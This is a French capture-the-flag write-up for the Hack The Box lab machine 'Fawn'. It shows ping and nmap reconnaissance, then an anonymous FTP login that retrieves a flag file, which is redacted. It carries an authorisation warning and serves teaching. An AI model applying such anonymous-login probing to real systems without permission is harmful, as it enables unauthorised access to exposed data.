Fawn
Fawn est la seconde box du parcours Starting Point de Hack The Box. Elle permet de découvrir un autre service potentiellement exploitable durant un pentest : le FTP.
Dans ce writeup, je ne publie pas directement le flag final, l'objectif est d'apprendre en pratiquant.
N'attaquez que des machines sur lesquelles vous avez l'autorisation (ex. machines HTB, ou lab perso). Respectez les règles de la plateforme.
Vidéo Walkthrough
Reconnaissance (Information gathering)
Découverte d'hôte (Asset discovery)
La première étape est de vérifier que la machine répond avec la commande ping.
┌─[user@parrot]─[~]
└──╼ $ping 10.129.130.0
PING 10.129.130.0 (10.129.130.0) 56(84) bytes of data.
64 bytes from 10.129.130.0: icmp_seq=1 ttl=63 time=16.1 ms
64 bytes from 10.129.130.0: icmp_seq=2 ttl=63 time=15.5 ms
^C
Énumération des services
┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.130.0
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Port 21/tcp ouvert. Le service FTP (vsftpd 3.0.3) est non chiffré. Sur des machines mal configurées, il peut accepter des connexions anonymes.
Pré-exploitation
Evaluation de vulnérabilité
On tente une connexion interactive via ftp 10.129.130.0.
┌─[user@parrot]─[~]
└──╼ $ftp 10.129.130.0
Connected to 10.129.130.0.
220 (vsFTPd 3.0.3)
Name (10.129.130.0:user):
Le service présente une invite d'authentification. On va tenter le compte anonymous avec un mot de passe vide.
Exploitation
Accès initial
Name (10.129.130.0:user): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
Connexion validée ! On télécharge le flag.
ftp> get flag.txt
ftp> exit
Post-Exploitation
┌─[user@parrot]─[~]
└──╼ $cat flag.txt
035{...hidden..}815
La machine est pwned !
Pour aller plus loin
Script Python de récupération automatique du flag : MohamedOutougane/Fawn_Automated
